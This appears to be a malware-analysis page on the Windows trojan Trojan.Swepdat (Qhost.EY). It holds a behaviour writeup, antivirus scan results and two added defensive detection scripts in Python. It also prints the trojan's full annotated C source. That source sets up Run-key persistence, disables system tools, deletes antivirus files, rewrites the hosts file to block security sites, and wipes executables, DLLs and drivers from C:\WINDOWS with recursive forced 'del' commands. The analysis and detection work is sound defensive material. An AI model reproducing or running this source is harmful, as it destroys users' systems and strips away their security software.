source - trojan.win32.qhost.ey
Trojan.Swepdat
Risk Level 1: Very Low
Discovered: December 15, 2005
Updated: February 13, 2007 12:50:03 PM
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
When Trojan.Swepdat is executed, it performs the following actions:
1. Copies itself as %System%\WUpdates.exe.
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
2. Adds the value:
"WUpdates" = "%System%\WUpdates.exe"
to the registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
so that it runs every time Windows starts.
3. Attempts to rename the following files:
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe to C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_
C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_
C:\WINDOWS\system32\Restorerstrui\rstrui.exe to C:\WINDOWS\system32\Restorerstrui\rstrui.ex_
C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_
C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_
C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_
Note: the rstrui path is reproduced exactly as the sample has it. It is missing the backslash between Restore and rstrui (the file lives in %System%\Restore on a standard installation), so that rename fails; the other five succeed on any system where the files exist.
4. Attempts to delete the following security-related files from the listed program folders and all their subfolders:
C:\Program Files\McAfee.com\Personal Firewall\*.dll
C:\Program Files\McAfee.com\Personal Firewall\data\*.*
C:\Program Files\McAfee.com\Personal Firewall\help\*.*
C:\Program Files\McAfee.com\VSO\*.dll
C:\Program Files\McAfee.com\VSO\*.ini
C:\Program Files\McAfee.com\VSO\Res00\*.dll
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*
C:\Program Files\McAfee.com\*.*
C:\Program Files\Norton AntiVirus\*.dll
C:\Program Files\Common Files\Symantec Shared\*.exe
C:\Program Files\Norton AntiVirus\*.ini
C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\Norton AntiVirus\*.inf
C:\Program Files\Zone Labs\ZoneAlarm\*.exe
C:\Program Files\Zone Labs\ZoneAlarm\*.zap
C:\Program Files\Zone Labs\ZoneAlarm\*.dll
C:\Program Files\Zone Labs\ZoneAlarm\repair\*.dll
C:\Program Files\Kaspersky Lab\AVP6\*.exe
C:\Program Files\Kaspersky Lab\AVP6\*.dll
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
5. Overwrites the hosts file with the following entries so that the listed sites resolve to 0.0.0.0. The sample opens the file for writing rather than appending, so every existing entry (including the localhost line) is lost, and it writes no line breaks, so all of the entries land on a single line:
0.0.0.0 google.com
0.0.0.0 www.hotmail.com
0.0.0.0 www.microsoft.com
0.0.0.0 microsoft.com
0.0.0.0 macafee.com
0.0.0.0 www.macafee.com
0.0.0.0 download.mcafee.com
0.0.0.0 www.download.mcafee.com
0.0.0.0 rads.mcafee.com
0.0.0.0 us.mcafee.com
0.0.0.0 www.networkassociates.com
0.0.0.0 networkassociates.com
0.0.0.0 update.symantec.com
0.0.0.0 updates.symantec.com
0.0.0.0 iveupdate.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.symantec.com
0.0.0.0 symantec.com
0.0.0.0 www.norton.com
0.0.0.0 google.com
0.0.0.0 bitdefender.com
0.0.0.0 www.viruslist.com
0.0.0.0 viruslist.com
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.kaspersky.com
0.0.0.0 kaspersky.com
0.0.0.0 kaspersky-labs.com
0.0.0.0 www.kaspersky-labs.com
0.0.0.0 www.trendmicro.com
0.0.0.0 trendmicro.com
0.0.0.0 www.pandasoftware.com
0.0.0.0 pandasoftware.com
0.0.0.0 www.nod32.com
0.0.0.0 nod32.com
0.0.0.0 yahoo.com
0.0.0.0 mail.yahoo.com
0.0.0.0 www.grisoft.com
0.0.0.0 www.f-secure.com
0.0.0.0 f-secure.com
6. Closes windows with the following window titles:
Windows Task Manager
Registry Editor
System Configuration Utility
Windows File Protection
7. Displays a message with the following properties:
Title: Error
Message: Access Violation at address: 0050666F
8. Creates the file C:\windows\system32\exploit.html, a malicious HTML file that causes a Denial of Service if opened: its script recurses without bound and its onerror handler reloads the page, so the browser hangs.
9. Attempts to delete the following files from the following folders:
C:\WINDOWS and all subfolders: *.exe, *.dll
C:\WINDOWS\System and all subfolders: *.exe, *.dll
C:\WINDOWS\System32 and all subfolders: *.exe, *.dll
C:\WINDOWS\System32\Restore, if present, and all subfolders: *.*
C:\WINDOWS\System32\DRIVERS, if present, and all subfolders: *.sys
10. Creates the file C:\NError.dmp, a harmless text file containing a single fake "Stop: 0x0000000A" bugcheck line.
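Checking a hosts file for this kind of sinkholing, as an added example written for this page (it is not part of the Symantec writeup or the sample's code). The vendor watchlist is an assumption drawn from the list above, the sample hosts content is constructed, and the parser deliberately handles the single-line form the sample produces, which a one-mapping-per-line parser would read as a lone google.com entry:

```python
"""Hosts-file triage for Qhost-style sinkholing (added example).

The sample writes its entries with fprintf and never emits a newline, so
the whole block lands on ONE line.  The resolver treats every token after
the first address as a name for that address, so the block still works,
but a parser that assumes "one mapping per line" sees only google.com.
This parser walks the tokens and starts a new group whenever it meets an
address token, so both normal files and the packed form are recovered.
"""
import ipaddress

# Constructed hosts-file content: a comment, a normal entry, and the packed
# single line that BlockSite() produces (shortened to a few names).
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-1999 Microsoft Corp.\n"
    "127.0.0.1       localhost\n"
    "0.0.0.0 google.com 0.0.0.0 www.hotmail.com 0.0.0.0 update.symantec.com"
    " 0.0.0.0 www.kaspersky.com 0.0.0.0 www.virustotal.com"
)

SINKHOLE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1"}

# Assumption: a partial watchlist of vendor/update domains taken from the
# writeup's list; extend it for your own environment.
VENDOR_WATCHLIST = {
    "symantec.com", "norton.com", "mcafee.com", "kaspersky.com",
    "kaspersky-labs.com", "trendmicro.com", "pandasoftware.com", "nod32.com",
    "bitdefender.com", "f-secure.com", "grisoft.com", "viruslist.com",
    "virustotal.com", "networkassociates.com", "microsoft.com",
}


def _is_addr(token):
    try:
        ipaddress.ip_address(token)
        return True
    except ValueError:
        return False


def parse_hosts(text):
    """Return a list of (address, hostname) pairs.

    Comments are stripped, the first token of a line must be an address,
    and any later address token starts a new group (the packed form)."""
    mappings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        if not _is_addr(tokens[0]):
            continue  # malformed line; the resolver ignores it as well
        current = tokens[0]
        for tok in tokens[1:]:
            if _is_addr(tok):
                current = tok
            else:
                mappings.append((current, tok.lower()))
    return mappings


def _registered_domain(host):
    # Naive last-two-labels rule; good enough for the .com names in play.
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def find_sinkholed_vendors(text, watchlist=VENDOR_WATCHLIST):
    """Watchlisted hostnames that the hosts file points at a sinkhole
    address, sorted for stable output."""
    hits = set()
    for addr, host in parse_hosts(text):
        if addr in SINKHOLE_ADDRS and _registered_domain(host) in watchlist:
            hits.add(host)
    return sorted(hits)


if __name__ == "__main__":
    for h in find_sinkholed_vendors(SAMPLE_HOSTS):
        print("sinkholed:", h)
```

Because the sample truncates the file rather than appending to it, remediation means rebuilding the hosts file from a known-good copy (at minimum the localhost line), not just deleting the flagged entries.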
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)

Antivirus          Version           Last Update  Result
AhnLab-V3          5.0.0.2           2009.05.23   -
AntiVir            7.9.0.168         2009.05.23   TR/Qhost.EY
Antiy-AVL          2.0.3.1           2009.05.22   Trojan/Win32.Qhost
Authentium         5.1.2.4           2009.05.22   W32/Heuristic-119!Eldorado
Avast              4.8.1335.0        2009.05.22   Win32:KillWin-S
AVG                8.5.0.339         2009.05.23   Generic.MAY
BitDefender        7.2               2009.05.23   Generic.Malware.SA!Q!w.2C8E19D0
CAT-QuickHeal      10.00             2009.05.23   Trojan.Qhost.ey
ClamAV             0.94.1            2009.05.22   Trojan.Rorren
Comodo             1157              2009.05.08   TrojWare.Win32.Qhosts.EY
DrWeb              5.0.0.12182       2009.05.23   Trojan.KillFiles.472
eSafe              7.0.17.0          2009.05.21   Win32.Qhost.ey
eTrust-Vet         31.6.6519         2009.05.23   -
F-Prot             4.4.4.56          2009.05.22   W32/Heuristic-119!Eldorado
F-Secure           8.0.14470.0       2009.05.23   Trojan.Win32.Qhost.ey
Fortinet           3.117.0.0         2009.05.23   W32/Qhost.EY!tr
GData              19                2009.05.23   Generic.Malware.SA!Q!w.2C8E19D0
Ikarus             T3.1.1.49.0       2009.05.23   Trojan.Win32.Qhost
K7AntiVirus        7.10.741          2009.05.21   Trojan.Win32.Qhost.ey
Kaspersky          7.0.0.125         2009.05.23   Trojan.Win32.Qhost.ey
McAfee             5623              2009.05.22   Zap-337
McAfee+Artemis     5623              2009.05.22   Zap-337
McAfee-GW-Edition  6.7.6             2009.05.23   Trojan.Qhost.EY
Microsoft          1.4701            2009.05.23   TrojanDropper:Win32/Logsnif
NOD32              4098              2009.05.22   Win32/Qhosts.EY
Norman                               2009.05.22   W32/Qhost.BZ
nProtect           2009.1.8.0        2009.05.23   Trojan/W32.Qhost.12288.D
PCTools            4.4.2.0           2009.05.21   Trojan.Qhosts
Prevx              3.0               2009.05.23   -
Rising             21.30.52.00       2009.05.23   Trojan.Qhost.eq
Sophos             4.42.0            2009.05.23   Troj/Killfile-F
Sunbelt            3.2.1858.2        2009.05.23   Trojan.Swepdat
Symantec           1.4.4.12          2009.05.23   Trojan.Swepdat
TheHacker          6.3.4.3.331       2009.05.22   Trojan/Qhost.ey
TrendMicro         8.950.0.1092      2009.05.23   -
VBA32              3.12.10.5         2009.05.23   Trojan.Win32.Qhost.ey
ViRobot            2009.5.23.1749    2009.05.23   -
VirusBuster        4.6.5.0           2009.05.22   Trojan.Qhost.RW
Additional information
File size: 12288 bytes
MD5: 35b259a4d83e4d59be351c396fd6b95a
SHA1: e20d0a5f2600162b76a2c89e3a101ce7240fcff8
SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
/*
 * closes Windows Task Manager
 * closes Registry Editor
 * closes System Configuration Utility
 * closes Windows File Protection
 * BlockSite
 * Deleting Windows
 * infected msconfig.exe
 * infected rstrui.exe
 * infected wscui.cpl
 * infected wupdmgr.exe
 * infected taskmgr.exe
 * kill files AV&FW
 *
 * made by ceoby
 */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>

/* Writeup steps 6 and 7: for 24 passes, look the listed tool windows up by
 * title, send each WM_CLOSE, then pop the fake "Access Violation" dialog.
 * MessageBox is modal, so every pass blocks until the user clicks OK.
 * The LPARAM/WPARAM casts are swapped; harmless since both are zero.
 * Closing "Windows File Protection" suppresses the WFP prompt that would
 * otherwise offer to restore the renamed and deleted system files. */
void hideprocess(){
    int i;
    for(i = 1; i < 25; i++){
        HWND program;
        Sleep (100);
        program = FindWindow(0, "Windows Task Manager");
        SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
        program = FindWindow(0, "Registry Editor");
        SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
        program = FindWindow(0, "System Configuration Utility");
        SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
        program = FindWindow(0, "Windows File Protection");
        SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
        MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );
    }
}

/* Globals. Only Wn and Mn are used, and only by the dead fPaths()/inst(). */
char Wn[MAX_PATH];
char Mn[MAX_PATH];
SOCKET sock;
HWND Wnd;
char Buffer [1230];
int x,y;

/* Writeup steps 1 and 2: copy the running image to %System%\WUpdates.exe
 * and register it under HKLM\...\CurrentVersion\Run. The local named
 * "system" shadows the CRT function inside this scope. The value is
 * written with sizeof(system), i.e. the full MAX_PATH buffer including
 * whatever follows the terminator; the function is declared int but never
 * returns a value. */
int Hkey(){
    char system[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
    GetSystemDirectory(system,sizeof(system));
    strcat(system,"\\WUpdates.exe");
    CopyFile(pathtofile,system,FALSE);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
    RegSetValueEx(hKey, "WUpdates",0,REG_SZ,(const unsigned char*)system,sizeof(system));
    RegCloseKey(hKey);
}

/* Dead code: fPaths() and inst() are never called from main(). inst()
 * refers to files this sample does not drop (MicroSuck.exe, Svchost32.exe)
 * and a second Run value ("Windows Security Updates") that the writeup
 * does not list; it looks like a leftover from an earlier variant. */
void fPaths(){
    GetSystemDirectory(Wn, sizeof(Wn));
    GetModuleFileName(0, Mn, sizeof(Mn));
    strcat(Wn, "\\WUpdates.exe");
}

void inst(){
    CopyFile(Mn,Wn,0);
    CopyFile ("WUpdates.exe", "C:\\windows",TRUE);
    CopyFile ("MicroSuck.exe", "C:\\windows\\system",TRUE);
    CopyFile ("Svchost32.exe", "C:\\windows\\system32",TRUE);
    HKEY inst;
    RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);
    RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));
    RegCloseKey(inst);
}

/* Writeup step 5. The path is hardcoded (no %System% lookup). fopen with
 * "w" truncates the hosts file, so every existing entry is lost, and no
 * "\n" is ever written, so all the mappings end up on one line. The
 * resolver still honours them, because every token after the first
 * address on a line is taken as a name for that address. Note the typo
 * "macafee.com": the real mcafee.com apex is not blocked, only its
 * listed subdomains. */
void BlockSite(){
    FILE *fpl;
    fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w");
    fprintf (fpl,"0.0.0.0 google.com");
    fprintf (fpl," 0.0.0.0 www.hotmail.com");
    fprintf (fpl," 0.0.0.0 www.microsoft.com");
    fprintf (fpl," 0.0.0.0 microsoft.com");
    fprintf (fpl," 0.0.0.0 macafee.com");
    fprintf (fpl," 0.0.0.0 www.macafee.com");
    fprintf (fpl," 0.0.0.0 download.mcafee.com");
    fprintf (fpl," 0.0.0.0 www.download.mcafee.com");
    fprintf (fpl," 0.0.0.0 rads.mcafee.com");
    fprintf (fpl," 0.0.0.0 us.mcafee.com");
    fprintf (fpl," 0.0.0.0 www.networkassociates.com");
    fprintf (fpl," 0.0.0.0 networkassociates.com");
    fprintf (fpl," 0.0.0.0 update.symantec.com");
    fprintf (fpl," 0.0.0.0 updates.symantec.com");
    fprintf (fpl," 0.0.0.0 iveupdate.symantec.com");
    fprintf (fpl," 0.0.0.0 norton.com");
    fprintf (fpl," 0.0.0.0 www.symantec.com");
    fprintf (fpl," 0.0.0.0 symantec.com");
    fprintf (fpl," 0.0.0.0 www.norton.com");
    fprintf (fpl," 0.0.0.0 google.com");
    fprintf (fpl," 0.0.0.0 bitdefender.com");
    fprintf (fpl," 0.0.0.0 www.viruslist.com");
    fprintf (fpl," 0.0.0.0 viruslist.com");
    fprintf (fpl," 0.0.0.0 www.virustotal.com");
    fprintf (fpl," 0.0.0.0 virustotal.com");
    fprintf (fpl," 0.0.0.0 www.kaspersky.com");
    fprintf (fpl," 0.0.0.0 kaspersky.com");
    fprintf (fpl," 0.0.0.0 kaspersky-labs.com");
    fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com");
    fprintf (fpl," 0.0.0.0 www.trendmicro.com");
    fprintf (fpl," 0.0.0.0 trendmicro.com");
    fprintf (fpl," 0.0.0.0 www.pandasoftware.com");
    fprintf (fpl," 0.0.0.0 pandasoftware.com");
    fprintf (fpl," 0.0.0.0 www.nod32.com");
    fprintf (fpl," 0.0.0.0 nod32.com");
    fprintf (fpl," 0.0.0.0 yahoo.com");
    fprintf (fpl," 0.0.0.0 mail.yahoo.com");
    fprintf (fpl," 0.0.0.0 www.grisoft.com");
    fprintf (fpl," 0.0.0.0 www.f-secure.com");
    fprintf (fpl," 0.0.0.0 f-secure.com");
    fclose(fpl);
}

/* Writeup step 9. Nothing here calls DeleteFile: each line spawns cmd.exe
 * with a forced, recursive, quiet "del", which is what shows up in
 * process-creation telemetry. This runs in the originally launched
 * process, so the copy dropped in System32 by Hkey() is wiped along with
 * everything else; only files locked by running processes survive. */
void DelWin(){
    system("del C:\\WINDOWS\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");
    system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");
    system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");
    system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");
}

/* Dead code: never called from main(). The stray ';' after the for header
 * gives the loop an empty body, so the braced block below runs exactly
 * once, and the counter is a char. Kept as written. */
void spaceup(){
    char i;
    FILE *Uknown;
    Uknown = fopen ("C:\\WINDOWS\\System32\\WUpdates.txt","w");
    for (i=1;i<100;i++);
    {
        Sleep (100);
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");
        fprintf(Uknown,"0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        Sleep (100);
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");
        Sleep (100);
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"3x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
        fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
    }
}

/* Writeup step 8: a page whose script recurses without bound and whose
 * onerror handler reloads it, so a browser that opens it hangs. The
 * handle is never closed; the file is flushed when the process exits. */
void Exploit(){
    FILE *ghp;
    ghp = fopen ("C:\\windows\\system32\\exploit.html","w");
    fprintf(ghp, "<html>");
    fprintf(ghp, "<script>");
    fprintf(ghp, "window.onerror=new Function(history.go(0));");
    fprintf(ghp, "function btf(){btf();}");
    fprintf(ghp, "btf();");
    fprintf(ghp, "</script>");
    fprintf(ghp, "</html>");
}

/* Writeup step 3. The for loop has no braces, so only the msconfig rename
 * is repeated (about ten million times, failing after the first); the
 * other renames run once. The rstrui path is missing the backslash
 * between "Restore" and "rstrui", so that rename never succeeds on a
 * real install. Ends with one more fake error dialog. */
void Anticlean(){
    int i;
    for(i = 1; i < 9999999; i++)
        rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe","C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
    Sleep (100);
    rename("C:\\WINDOWS\\regedit.exe","C:\\WINDOWS\\regedit.ex_");
    Sleep (100);
    rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
           "C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");
    Sleep (100);
    rename("C:\\WINDOWS\\system32\\wscui.cpl","C:\\WINDOWS\\system32\\wscui.cp_");
    Sleep (100);
    rename("C:\\WINDOWS\\system32\\wupdmgr.exe","C:\\WINDOWS\\system32\\wupdagr.ex_");
    Sleep (100);
    rename("C:\\WINDOWS\\system32\\taskmgr.exe","C:\\WINDOWS\\system32\\taskdae.ex_");
    Sleep (100);
    MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );
}

/* Writeup step 4: forced, recursive, quiet deletes under the vendor
 * product directories, again via cmd.exe /c. */
void killavfw(){
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");
    system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");
    system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");
    system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");
    system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}

int main(int argc, char *argv[]){
    /* Console-subsystem binary: allocate a console, then hide its window. */
    HWND wndstealth;
    AllocConsole();
    wndstealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(wndstealth,0);

    /* Actual execution order; the writeup's numbering groups by effect,
     * not by sequence. Persistence is set up first, the wipe comes last. */
    Hkey();
    Anticlean();
    killavfw();
    BlockSite();
    hideprocess();
    Exploit();
    DelWin();

    /* Writeup step 10: a text file holding one fake STOP 0x0000000A line. */
    FILE *fp;
    fp = fopen ("c:\\NError.dmp","w");
    {
        fprintf(fp,"%s","Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");
        fclose(fp);
    }
}
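Telemetry-side detection for the persistence and wipe phases, as an added example written for this page (it is neither the sample's code nor Symantec's). Because every deletion above goes through system(), each one appears as a cmd.exe child with a recursive, quiet "del" on its command line, and persistence is one Run value written by the launched process. The events are constructed in the shape of Sysmon process-creation and registry value-set records; the field names, the installer allowlist, the sensitive roots, the path setup.exe (standing in for wherever the sample was first launched) and the assumption that the CRT's system() runs "cmd.exe /c <command>" are all assumptions, not facts from the page:

```python
"""Detections for the Run-key persistence and cmd.exe-driven wipe (added
example, constructed telemetry). Field names follow Sysmon's schema for
EventID 1 (process create) and EventID 13 (registry value set)."""
import re

RUN_KEY = "\\currentversion\\run\\"
SENSITIVE_ROOTS = ("c:\\windows", "c:\\program files")                 # assumption
INSTALLER_ALLOWLIST = {"msiexec.exe", "explorer.exe", "regedit.exe"}  # assumption

# Constructed events. setup.exe is an assumed launch path; after a reboot the
# same chain reappears with C:\WINDOWS\system32\WUpdates.exe as the parent.
EVENTS = [
    {"EventID": 1, "Image": "C:\\Documents and Settings\\user\\Desktop\\setup.exe",
     "ParentImage": "C:\\WINDOWS\\explorer.exe",
     "CommandLine": "\"C:\\Documents and Settings\\user\\Desktop\\setup.exe\""},
    {"EventID": 13, "Image": "C:\\Documents and Settings\\user\\Desktop\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WUpdates",
     "Details": "C:\\WINDOWS\\system32\\WUpdates.exe"},
    {"EventID": 1, "Image": "C:\\WINDOWS\\system32\\cmd.exe",
     "ParentImage": "C:\\Documents and Settings\\user\\Desktop\\setup.exe",
     "CommandLine": "cmd.exe /c del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q "},
    {"EventID": 1, "Image": "C:\\WINDOWS\\system32\\cmd.exe",
     "ParentImage": "C:\\Documents and Settings\\user\\Desktop\\setup.exe",
     "CommandLine": "cmd.exe /c del C:\\WINDOWS\\System32\\*.dll /F /S /Q"},
    {"EventID": 1, "Image": "C:\\WINDOWS\\system32\\cmd.exe",
     "ParentImage": "C:\\WINDOWS\\explorer.exe",
     "CommandLine": "cmd.exe /c del C:\\temp\\build\\*.obj /S /Q"},   # benign tree
]


def recursive_delete_target(cmdline):
    """Target of a recursive (/S) quiet (/Q) 'del' aimed under a sensitive
    root, or None. Flags and path are separated token-wise so that paths
    containing spaces ("Program Files") are kept whole."""
    m = re.search(r"\bdel\b\s+(.*)$", cmdline, re.I)
    if not m:
        return None
    flags, target_parts = set(), []
    for tok in m.group(1).split():
        if re.fullmatch(r"/[A-Za-z]", tok):
            flags.add(tok.lower())
        else:
            target_parts.append(tok)
    target = " ".join(target_parts)
    if {"/s", "/q"} <= flags and target.lower().startswith(SENSITIVE_ROOTS):
        return target
    return None


def run_key_writer(event):
    """(writer image, value data) for a Run value written by anything that
    is not an allowlisted installer; None otherwise."""
    if event.get("EventID") != 13:
        return None
    if RUN_KEY not in event.get("TargetObject", "").lower():
        return None
    image = event.get("Image", "")
    if image.rsplit("\\", 1)[-1].lower() in INSTALLER_ALLOWLIST:
        return None
    return image, event.get("Details", "")


def triage(events):
    """One finding per matching event. 'actor' is the process to pivot on:
    the registry writer, or the parent that spawned the cmd.exe."""
    findings = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            target = recursive_delete_target(ev.get("CommandLine", ""))
            if target:
                findings.append({"rule": "recursive_delete", "index": i,
                                 "actor": ev.get("ParentImage", ""), "target": target})
        hit = run_key_writer(ev)
        if hit:
            findings.append({"rule": "run_key_persistence", "index": i,
                             "actor": hit[0], "data": hit[1]})
    return findings


def correlate(findings):
    """Actors that both registered a Run value and drove recursive deletes
    under sensitive roots: the combination this sample shows, and a far
    stronger signal than either rule alone (an uninstaller may do one)."""
    by_actor = {}
    for f in findings:
        by_actor.setdefault(f["actor"].lower(), set()).add(f["rule"])
    return sorted(a for a, rules in by_actor.items()
                  if {"run_key_persistence", "recursive_delete"} <= rules)


if __name__ == "__main__":
    found = triage(EVENTS)
    for f in found:
        print(f)
    print("correlated actors:", correlate(found))
```

The delete rule keys on the switches rather than on the exact paths from the writeup, so it also catches variants that wipe other trees; the correlation step is what separates this sample from an aggressive uninstaller, which may write a Run value or delete its own directory but not both under system roots.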